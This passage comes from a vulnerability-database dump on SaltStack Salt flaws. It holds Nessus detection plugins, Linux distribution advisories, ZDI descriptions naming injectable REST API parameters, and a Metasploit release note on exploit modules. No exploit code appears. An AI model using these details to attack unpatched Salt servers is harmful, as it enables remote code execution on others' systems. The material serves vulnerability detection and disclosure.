\"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"py36-salt>=3002<3002.1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py37-salt>=3002<3002.1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py38-salt>=3002<3002.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-21T03:19:01", "description": "The remote host is affected by the vulnerability described in GLSA-202011-13\n(Salt: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Salt. Please review the\n CVE identifiers referenced below for details.\n \nImpact :\n\n Please review the referenced CVE identifiers for details.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 3, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-11-12T00:00:00", "title": "GLSA-202011-13 : Salt: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-16846", "CVE-2020-25592", "CVE-2020-17490"], "modified": "2020-11-12T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:salt", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-202011-13.NASL", "href": "https://www.tenable.com/plugins/nessus/142850", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 202011-13.\n#\n# The advisory text is Copyright (C) 2001-2020 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(142850);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/20\");\n\n script_cve_id(\"CVE-2020-16846\", \"CVE-2020-17490\", \"CVE-2020-25592\");\n script_xref(name:\"GLSA\", value:\"202011-13\");\n\n script_name(english:\"GLSA-202011-13 : Salt: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is affected by the vulnerability described in GLSA-202011-13\n(Salt: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Salt. Please review the\n CVE identifiers referenced below for details.\n \nImpact :\n\n Please review the referenced CVE identifiers for details.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n # https://www.saltstack.com/blog/on-november-3-2020-saltstack-publicly-disclosed-three-new-cves/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f2a5e02b\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/202011-13\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"All Salt users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-admin/salt-3000.5'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-25592\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt REST API Arbitrary Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:salt\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"app-admin/salt\", unaffected:make_list(\"ge 3000.5\"), vulnerable:make_list(\"lt 3000.5\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Salt\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-21T05:01:06", "description": "This update for salt fixes the following issues :\n\n - Avoid regression on 'salt-master': set passphrase for\n salt-ssh keys to empty string (bsc#1178485)\n\n - Properly validate eauth credentials and tokens on SSH\n calls made by Salt API (bsc#1178319, bsc#1178362,\n bsc#1178361, CVE-2020-25592, CVE-2020-17490,\n CVE-2020-16846)\n\n - Fix disk.blkid to avoid unexpected keyword argument\n '__pub_user'. (bsc#1177867)\n\n - Ensure virt.update stop_on_reboot is updated with its\n default value.\n\n - Do not break package building for systemd OSes.\n\n - Drop wrong mock from chroot unit test.\n\n - Support systemd versions with dot. (bsc#1176294)\n\n - Fix for grains.test_core unit test.\n\n - Fix file/directory user and group ownership containing\n UTF-8 characters. (bsc#1176024)\n\n - Several changes to virtualization :\n\n - Fix virt update when cpu and memory are changed.\n\n - Memory Tuning GSoC.\n\n - Properly fix memory setting regression in virt.update.\n\n - Expose libvirt on_reboot in virt states.\n\n - Support transactional systems (MicroOS).\n\n - zypperpkg module ignores retcode 104 for search().\n (bsc#1159670)\n\n - Xen disk fixes. No longer generates volumes for Xen\n disks, but the corresponding file or block disk.\n (bsc#1175987)\n\n - Invalidate file list cache when cache file modified time\n is in the future. (bsc#1176397)\n\n - Prevent import errors when running test_btrfs unit tests\n\nThis update was imported from the SUSE:SLE-15-SP1:Update update\nproject.", "edition": 5, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-11-09T00:00:00", "title": "openSUSE Security Update : salt (openSUSE-2020-1868)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-16846", "CVE-2020-25592", "CVE-2020-17490"], "modified": "2020-11-09T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:salt", "p-cpe:/a:novell:opensuse:salt-syndic", "p-cpe:/a:novell:opensuse:salt-master", "cpe:/o:novell:opensuse:15.1", "p-cpe:/a:novell:opensuse:salt-bash-completion", "p-cpe:/a:novell:opensuse:salt-zsh-completion", "p-cpe:/a:novell:opensuse:python2-salt", "p-cpe:/a:novell:opensuse:salt-api", "p-cpe:/a:novell:opensuse:salt-fish-completion", "p-cpe:/a:novell:opensuse:salt-standalone-formulas-configuration", "p-cpe:/a:novell:opensuse:salt-ssh", "p-cpe:/a:novell:opensuse:salt-minion", "p-cpe:/a:novell:opensuse:salt-cloud", "p-cpe:/a:novell:opensuse:salt-proxy", "p-cpe:/a:novell:opensuse:python3-salt"], "id": "OPENSUSE-2020-1868.NASL", "href": "https://www.tenable.com/plugins/nessus/142620", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-1868.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(142620);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/20\");\n\n script_cve_id(\"CVE-2020-16846\", \"CVE-2020-17490\", \"CVE-2020-25592\");\n\n script_name(english:\"openSUSE Security Update : salt (openSUSE-2020-1868)\");\n script_summary(english:\"Check for the openSUSE-2020-1868 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for salt fixes the following issues :\n\n - Avoid regression on 'salt-master': set passphrase for\n salt-ssh keys to empty string (bsc#1178485)\n\n - Properly validate eauth credentials and tokens on SSH\n calls made by Salt API (bsc#1178319, bsc#1178362,\n bsc#1178361, CVE-2020-25592, CVE-2020-17490,\n CVE-2020-16846)\n\n - Fix disk.blkid to avoid unexpected keyword argument\n '__pub_user'. (bsc#1177867)\n\n - Ensure virt.update stop_on_reboot is updated with its\n default value.\n\n - Do not break package building for systemd OSes.\n\n - Drop wrong mock from chroot unit test.\n\n - Support systemd versions with dot. (bsc#1176294)\n\n - Fix for grains.test_core unit test.\n\n - Fix file/directory user and group ownership containing\n UTF-8 characters. (bsc#1176024)\n\n - Several changes to virtualization :\n\n - Fix virt update when cpu and memory are changed.\n\n - Memory Tuning GSoC.\n\n - Properly fix memory setting regression in virt.update.\n\n - Expose libvirt on_reboot in virt states.\n\n - Support transactional systems (MicroOS).\n\n - zypperpkg module ignores retcode 104 for search().\n (bsc#1159670)\n\n - Xen disk fixes. No longer generates volumes for Xen\n disks, but the corresponding file or block disk.\n (bsc#1175987)\n\n - Invalidate file list cache when cache file modified time\n is in the future. (bsc#1176397)\n\n - Prevent import errors when running test_btrfs unit tests\n\nThis update was imported from the SUSE:SLE-15-SP1:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1159670\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1175987\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1176024\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1176294\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1176397\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1177867\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1178319\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1178361\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1178362\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1178485\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected salt packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-25592\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt REST API Arbitrary Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python2-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-bash-completion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-cloud\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-fish-completion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-master\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-minion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-ssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-standalone-formulas-configuration\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-syndic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-zsh-completion\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"python2-salt-3000-lp151.5.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"python3-salt-3000-lp151.5.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-3000-lp151.5.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-api-3000-lp151.5.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-bash-completion-3000-lp151.5.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-cloud-3000-lp151.5.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-fish-completion-3000-lp151.5.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-master-3000-lp151.5.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-minion-3000-lp151.5.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-proxy-3000-lp151.5.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-ssh-3000-lp151.5.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-standalone-formulas-configuration-3000-lp151.5.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-syndic-3000-lp151.5.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-zsh-completion-3000-lp151.5.30.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python2-salt / python3-salt / salt / salt-api / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2020-12-05T01:25:36", "bulletinFamily": "unix", "cvelist": ["CVE-2020-16846", "CVE-2020-25592", "CVE-2020-17490"], "description": "- -------------------------------------------------------------------------\nDebian LTS Advisory DLA-2480-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ Abhijith PA\nDecember 04, 2020 https://wiki.debian.org/LTS\n- -------------------------------------------------------------------------\n\nPackage : salt\nVersion : 2016.11.2+ds-1+deb9u6\nCVE ID : CVE-2020-16846 CVE-2020-17490 CVE-2020-25592\n\nSeveral vulnerabilities were discovered in salt.\n\nCVE-2020-16846\n\n An unauthenticated user with network access to the Salt API can use\n shell injections to run code on the Salt-API using the SSH client\n\nCVE-2020-17490\n\n When using the functions create_ca, create_csr, and\n create_self_signed_cert in the tls execution module, it would not\n ensure the key was created with the correct permissions.\n\nCVE-2020-25592\n\n Properly validate eauth credentials and tokens along with their Access\n Control Lists \u2013 ACLs. Prior to this change, eauth was not properly\n validated when calling Salt SSH via the salt-api. Any value for \u201ceauth\u201d\n or \u201ctoken\u201d would allow a user to bypass authentication and make calls\n to Salt SSH\n\nFor Debian 9 stretch, these problems have been fixed in version\n2016.11.2+ds-1+deb9u6.\n\nWe recommend that you upgrade your salt packages.\n\nFor the detailed security status of salt please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/salt\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 1, "modified": "2020-12-04T17:34:18", "published": "2020-12-04T17:34:18", "id": "DEBIAN:DLA-2480-1:6BEB1", "href": "https://lists.debian.org/debian-lts-announce/2020/debian-lts-announce-202012/msg00007.html", "title": "[SECURITY] [DLA 2480-1] salt security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdi": [{"lastseen": "2020-11-26T01:22:25", "bulletinFamily": "info", "cvelist": ["CVE-2020-16846"], "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of SaltStack Salt. Authentication is not required to exploit this vulnerability. The specific flaw exists within the rest_cherrypy module. When parsing the ssh_options parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the salt-api process.", "edition": 1, "modified": "2020-11-26T00:00:00", "published": "2020-11-24T00:00:00", "id": "ZDI-20-1381", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-1381/", "title": "SaltStack Salt rest_cherrypy ssh_options Command Injection Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-26T01:22:25", "bulletinFamily": "info", "cvelist": ["CVE-2020-16846"], "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of SaltStack Salt. Authentication is not required to exploit this vulnerability. The specific flaw exists within the rest_cherrypy module. When parsing the tgt parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the salt-api process.", "edition": 1, "modified": "2020-11-26T00:00:00", "published": "2020-11-24T00:00:00", "id": "ZDI-20-1380", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-1380/", "title": "SaltStack Salt rest_cherrypy tgt Command Injection Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-26T01:22:25", "bulletinFamily": "info", "cvelist": ["CVE-2020-16846"], "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of SaltStack Salt. Authentication is not required to exploit this vulnerability. The specific flaw exists within the rest_cherrypy module. When parsing the ssh_port parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the salt-api process.", "edition": 1, "modified": "2020-11-26T00:00:00", "published": "2020-11-24T00:00:00", "id": "ZDI-20-1382", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-1382/", "title": "SaltStack Salt rest_cherrypy ssh_port Command Injection Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-26T01:22:25", "bulletinFamily": "info", "cvelist": ["CVE-2020-16846"], "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of SaltStack Salt. Authentication is not required to exploit this vulnerability. The specific flaw exists within the rest_cherrypy module. When parsing the ssh_remote_port_forwards parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the salt-api process.", "edition": 1, "modified": "2020-11-26T00:00:00", "published": "2020-11-24T00:00:00", "id": "ZDI-20-1383", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-1383/", "title": "SaltStack Salt rest_cherrypy ssh_remote_port_forwards Command Injection Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-26T01:22:25", "bulletinFamily": "info", "cvelist": ["CVE-2020-16846"], "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of SaltStack Salt. Authentication is not required to exploit this vulnerability. The specific flaw exists within the rest_cherrypy module. When parsing the ssh_priv parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the salt-api process.", "edition": 1, "modified": "2020-11-26T00:00:00", "published": "2020-11-24T00:00:00", "id": "ZDI-20-1379", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-1379/", "title": "SaltStack Salt rest_cherrypy ssh_priv Command Injection Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2020-11-13T20:46:22", "bulletinFamily": "info", "cvelist": ["CVE-2020-16846", "CVE-2020-25213", "CVE-2020-25592", "CVE-2020-7384"], "description": "## SaltStack RCE\n\n\n\n[wvu-r7](<https://github.com/wvu-r7>) added an exploit [module](<https://github.com/rapid7/metasploit-framework/pull/14379>) that targets SaltStack\u2019s Salt software. Specifically, the module exploits both an authentication bypass (CVE-2020-25592) and a command injection vulnerability (CVE-2020-16846) in SaltStack\u2019s REST API to get code execution as `root` through Salt\u2019s SSH client on infected versions. You can read more about the vulns [on AttackerKB](<https://attackerkb.com/topics/TCY0EUyJIW/cve-2020-25592-saltstack-authentication-bypass-and-salt-ssh-command-execution?referrer=wrapup#rapid7-analysis>).\n\n## Hack Metasploit with Metasploit\n\n[justinsteven](<https://github.com/justinsteven>) both discovered a vulnerability (CVE-2020-7384) in and added an exploit [module](<https://github.com/rapid7/metasploit-framework/pull/14331>) for Metasploit\u2019s `msfvenom` utility. `msfvenom` allows users to use custom apk templates to inject a payload into; however, `msfvenom` does not sanitize certain fields, such as the `Owner` field, that get passed into a `Open3.popen3()` call. Because of this, an unsuspecting user of `msfvenom` might use a malicious template and subsequently give an attacker a shell on the user\u2019s computer. This issue has been fixed in Metasploit\u2019s `6.0.12` release and Metasploit Pro\u2019s `4.19.0` release.\n\n## Wordpress File Manager RCE\n\n[ide0x90](<https://github.com/ide0x90>) added an exploit [module](<https://github.com/rapid7/metasploit-framework/pull/14253>) that targets various versions of a popular Wordpress plugin, `Wordpress File Manager`. The vulnerability (CVE-2020-25213) is due to a leftover example file that enables unauthenticated execution of a set of commands. One of those commands is an `upload` command, which makes uploading a php webshell and getting code execution effortless.\n\n## Apache Zookeeper Info Disclosure\n\n[juushya](<https://github.com/juushya>) added an auxiliary [module](<https://github.com/rapid7/metasploit-framework/pull/14269>) that obtains useful information such as IPs of connected clients, server OS information and statistics, and log files from Apache Zookeeper instances.\n\n## New modules (4)\n\n * [SaltStack Salt REST API Arbitrary Command Execution](<https://github.com/rapid7/metasploit-framework/pull/14379>) by wvu and KPC, which exploits [CVE-2020-16846](<https://attackerkb.com/topics/FrF3udya6o/cve-2020-16846-saltstack-unauthenticated-shell-injection?referrer=wrapup#rapid7-analysis>) and [CVE-2020-25592](<https://attackerkb.com/topics/TCY0EUyJIW/cve-2020-25592-saltstack-authentication-bypass-and-salt-ssh-command-execution>)\n * [WordPress File Manager Unauthenticated Remote Code Execution](<https://github.com/rapid7/metasploit-framework/pull/14253>) by Alex Souza (w4fz5uck5) and Imran E. Dawoodjee, which exploits [CVE-2020-25213](<https://attackerkb.com/topics/biVgLIkiSE/cve-2020-25213>)\n * [Rapid7 Metasploit Framework msfvenom APK Template Command Injection](<https://github.com/rapid7/metasploit-framework/pull/14331>) by Justin Steven, which exploits [CVE-2020-7384](<https://attackerkb.com/topics/MmrdI6rWUn/cve-2020-7384>)\n * [Apache ZooKeeper Information Disclosure](<https://github.com/rapid7/metasploit-framework/pull/14269>) by Karn Ganeshen\n\n## Enhancements and features\n\n * PR [#14387](<https://github.com/rapid7/metasploit-framework/pull/14387>) by [adfoster-r7](<https://github.com/adfoster-r7>) added a check to ensure that uses of `AutoCheck` are always prepended as opposed to included in modules.\n * PR [#14373](<https://github.com/rapid7/metasploit-framework/pull/14373>) by [dwelch-r7](<https://github.com/dwelch-r7>) removed the unused Netware console session type from Framework.\n * PR [#14371](<https://github.com/rapid7/metasploit-framework/pull/14371>) by [h00die](<https://github.com/h00die>) added vulnerable version information to the `auxiliary/scanner/http/drupal_views_user_enum` module.\n * PR [#14353](<https://github.com/rapid7/metasploit-framework/pull/14353>) by [agalway-r7](<https://github.com/agalway-r7>) modified the `msfdb` command to show more readable and informative output to the user.\n\n## Bugs fixed\n\n * PR [#14304](<https://github.com/rapid7/metasploit-framework/pull/14304>) by [b4rtik](<https://github.com/b4rtik>) updated the `post/windows/manage/execute_dotnet_assembly` module to be able to handle additional function signatures of the code that will be injected into.\n * PR [#14382](<https://github.com/rapid7/metasploit-framework/pull/14382>) from [h00die](<https://github.com/h00die>) fixed a crash in the `auxiliary/analyze/apply_pot` module caused by an out-of-date symbol name.\n * PR [#14378](<https://github.com/rapid7/metasploit-framework/pull/14378>) by [adfoster-r7](<https://github.com/adfoster-r7>) added proper synchronization to the job status tracker that is used by Metasploit\u2019s RPC service.\n * PR [#14370](<https://github.com/rapid7/metasploit-framework/pull/14370>) by [cgranleese-r7](<https://github.com/cgranleese-r7>) fixed a crash in `msfconsole`\u2019s `generate` command caused by attempting to tab complete input with no results.\n * PR [#14363](<https://github.com/rapid7/metasploit-framework/pull/14363>) by [zeroSteiner](<https://github.com/zeroSteiner>) fixed an issue in the `auxiliary/scanner/smb/smb_login` module that reported false negatives for valid credentials when `msfconsole` was started with `bundle exec` preceding the command.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.0.15...6.0.16](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222020-11-05T10%3A12%3A21-06%3A00..2020-11-12T16%3A18%3A40%2B00%3A00%22>)\n * [Full diff 6.0.15...6.0.16](<https://github.com/rapid7/metasploit-framework/compare/6.0.15...6.0.16>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly 